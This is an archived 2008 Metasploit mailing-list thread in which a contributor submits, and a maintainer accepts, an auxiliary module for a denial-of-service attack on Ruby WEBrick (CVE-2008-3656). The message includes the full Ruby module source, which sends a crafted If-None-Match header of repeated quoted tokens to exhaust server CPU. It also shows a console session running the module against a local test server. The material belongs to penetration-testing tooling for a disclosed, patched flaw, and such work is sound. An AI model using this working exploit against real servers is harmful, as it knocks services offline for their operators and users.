Re: [framework-hackers] DoS Module: WEBrick DefaultFileHandler

Fri, 17 Oct 2008 08:42:23 -0700 

Added. Thanks!

Best regards,


On Thu, 2008-10-16 at 20:23 -0500, Kris Katterjohn wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
> 
> Hey guys,
> 
> I've attached a new DoS module for the WEBrick vulnerability[1]
> (WEBrick::HTTP::DefaultFileHandler) which causes massive CPU consumption.
> 
> I ran this simple server (like the one here[2]):
> 
> 
> require 'webrick'
> WEBrick::HTTPServer.new(:Port => 3333, :DocumentRoot => ".").start
> 
> 
> in my metasploit SVN checkout, and then ran this:
> 
> 
> msf > use dos/webrick_regex
> msf auxiliary(webrick_regex) > set RHOST 127.0.0.1
> RHOST => 127.0.0.1
> msf auxiliary(webrick_regex) > set RPORT 3333
> RPORT => 3333
> msf auxiliary(webrick_regex) > set URI /README
> URI => /README
> msf auxiliary(webrick_regex) > run
> [*] Request sent to 127.0.0.1:3333
> [*] Auxiliary module execution completed
> 
> 
> And watched my CPU usage go through the roof until I killed the server.
> 
> 
> msf auxiliary(webrick_regex) > info
> 
>        Name: Ruby WEBrick::HTTP::DefaultFileHandler DoS
>     Version: 1
> 
> Provided by:
>   Kris Katterjohn <[EMAIL PROTECTED]>
> 
> Basic options:
>   Name     Current Setting  Required  Description
>   ----     ---------------  --------  -----------
>   Proxies                   no        Use a proxy chain
>   RHOST    127.0.0.1        yes       The target address
>   RPORT    3333             yes       The target port
>   SSL      false            no        Use SSL
>   URI      /README          yes       URI to request
>   VHOST                     no        HTTP server virtual host
> 
> Description:
>   The WEBrick::HTTP::DefaultFileHandler in WEBrick in Ruby 1.8.5 and
>   earlier, 1.8.6 to 1.8.6-p286, 1.8.7 to 1.8.7-p71, and 1.9 to r18423
>   allows for a DoS (CPU consumption) via a crafted HTTP request.
> 
> 
> Thanks,
> Kris Katterjohn
> 
> [1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3656
> [2] 
> http://www.ruby-lang.org/en/news/2008/08/08/multiple-vulnerabilities-in-ruby/
> 
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.6 (GNU/Linux)
> Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
> 
> iQIVAwUBSPfo/v9K37xXYl36AQJz5hAAgjUurVAXTXbOT5sw+9STo2CGSWU1Zto7
> lTTc79QOyfmZZIJPN9e8lGGGTG7KBroxv0cwGwwurCQLeFyWSaIb/7dmc1Y353/5
> hsDGPrxito8KaM7qY/UT3MRJbQdBK+XjbhGgUfldfhB+dP2iPz02bKl/Rbp/fXXV
> wl4PSbF1fNlzLGkDE2ZilrO4amqxJ7c3X1hTcOC4AmkabYcxcgpnfxCz94irPSl+
> Jr8lw9vN+6x3sj2pYEhzM2SpUIV9yERX/onX/+fYE3OHiSg2KycMPX8pbiZ1rFgN
> Cw9D98BSBxGhpfS09UGCO4avooqs3D6Ea8tCV9WDCQZCOQoN+cryzQwCItqnBtUY
> 0uXHnccrXGBMlbAeKv4bp5K6GQJXLRKdrBc6NOQJ5e1jUrFSGdAOZo2Z25oQ5Q4R
> yOPq1wYtTYxJyl3mU4XeEkpsfO8dTKYQQXRa7WtLGibFq2xUZg+OSLVqaX/bLmf8
> SRhQwxGKLaC6jBDZilSfd3J2/JsqMj5zCpDiqOGsP2jhA4+iArpj4PIN+RG4GblJ
> mBwztAolNjcl0GXUNfXjzW5ZoHXYJNf22YNZBeqieYPKEoZLiQD3KFsbGmJ9l0Us
> 95acG9fw3mxhiYq7P5OnXX21ytHwA+3HEfO4yQrsXQDzrJpjYsQ40WtSNIFQud/4
> kJqH/wbxWcQ=
> =dJWD
> -----END PGP SIGNATURE-----
> plain text document attachment (webrick_regex.rb)
> require 'msf/core'
> 
> class Metasploit3 < Msf::Auxiliary
> 
>       include Msf::Exploit::Remote::HttpClient
> 
>       def initialize(info = {})
>               super(update_info(info, 
>                       'Name'           => 'Ruby 
> WEBrick::HTTP::DefaultFileHandler DoS',
>                       'Description'    => %q{
>                               The WEBrick::HTTP::DefaultFileHandler in 
> WEBrick in
>                               Ruby 1.8.5 and earlier, 1.8.6 to 1.8.6-p286, 
> 1.8.7
>                               to 1.8.7-p71, and 1.9 to r18423 allows for a DoS
>                               (CPU consumption) via a crafted HTTP request.
>                       },
>                       'Author'         => 'Kris Katterjohn <[EMAIL 
> PROTECTED]>',
>                       'License'        => MSF_LICENSE,
>                       'Version'        => '1',
>                       'References'     => [
>                               [ 'BID', '30644'],
>                               [ 'CVE', '2008-3656'],
>                               [ 'URL', 
> 'http://www.ruby-lang.org/en/news/2008/08/08/multiple-vulnerabilities-in-ruby/']
>                       ],
>                       'DisclosureDate' => 'Aug 08 2008'))
> 
>               register_options([
>                       OptString.new('URI', [ true, 'URI to request', '/' ])
>               ])
>       end
> 
>       def run
>               begin
>                       o = {
>                               'uri' => datastore['URI'] || '/',
>                               'headers' => {
>                                       'If-None-Match' => %q{foo=""} + 
> %q{bar="baz" } * 100
>                               }
>                       }
> 
>                       c = connect(o)
>                       c.send_request(c.request_raw(o))
> 
>                       print_status("Request sent to #{rhost}:#{rport}")
>               rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, 
> ::Rex::ConnectionTimeout
>                       print_status("Couldn't connect to #{rhost}:#{rport}")
>               rescue ::Timeout::Error, ::Errno::EPIPE                 
>               end
>       end
> end
> 
> _______________________________________________
> Framework-Hackers mailing list
> Framework-Hackers@spool.metasploit.com
> http://spool.metasploit.com/mailman/listinfo/framework-hackers

Attachment: signature.asc
Description: This is a digitally signed message part

_______________________________________________
Framework-Hackers mailing list
Framework-Hackers@spool.metasploit.com
http://spool.metasploit.com/mailman/listinfo/framework-hackers

Reply via email to